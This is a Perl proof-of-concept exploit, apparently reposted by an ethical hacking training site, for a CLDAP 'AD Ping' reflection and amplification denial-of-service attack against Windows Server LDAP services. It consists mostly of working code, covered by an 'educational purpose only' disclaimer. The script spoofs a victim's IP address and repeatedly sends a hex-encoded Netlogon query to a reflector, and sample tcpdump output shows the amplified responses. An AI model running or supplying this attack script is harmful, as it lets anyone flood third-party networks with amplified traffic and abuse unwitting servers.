Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: Todor Donev

#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
#  (CLDAP "AD Ping") query reflection DoS PoC
#
#
#  MS Windows Server 2016       [NOT TESTED !!!]
#
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP service (CLDAP) and using
#  address spoofing makes it appear to originate from the intended
#  victim. The CLDAP service responds to the spoofed address,
#  sending unwanted network traffic to the attacker’s intended target.
#
#  Amplification techniques allow bad actors to intensify the size
#  of their attacks, because the responses generated by the LDAP
#  servers are much larger than the attacker’s queries. In this case,
#  the LDAP service responses are capable of reaching very high
#  bandwidth and we have seen an average amplification factor of
#  46x and a peak of 55x.
#
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not
#  use it without permission. The usual disclaimer applies, especially
#  the fact that Todor Donev is not liable for any damages caused by
#  direct or indirect use of the information or functionality provided
#  by these programs. The author or any Internet provider bears NO
#  responsibility for content or misuse of these programs or any
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.)
#  caused by the use of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#
#
#  # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
#  [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
#  [ ======
#  [ Usg: cldapdrdos.pl <ldap server> <target> <port>
#  [ Default port: 389
#  [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
#  [ Sending CLDAP "AD Ping" packets..
#  # tcpdump -i eth0 -c4 port 389
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  4 packets captured
#  6 packets received by filter
#  0 packets dropped by kernel
#
#
#
   
use Net::RawIP;
 
print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
 
my $cldap       = $ARGV[0];
my $target      = $ARGV[1];
my $port        = $ARGV[2] || '389';
 
die "[ Error: Port must be between 1 and 65535!\n"       if ($port < 1 || $port > 65535);
 
my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";
  
my $sock =  new Net::RawIP({ udp => {} }) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
                select(undef, undef, undef, 0.40);         # Sleep 400 milliseconds
                $sock->set({  ip =>  { saddr  => $target, daddr => $cldap},
                             udp =>  { source => 31337,   dest  => $port, data => $query} });
                $sock->send;
}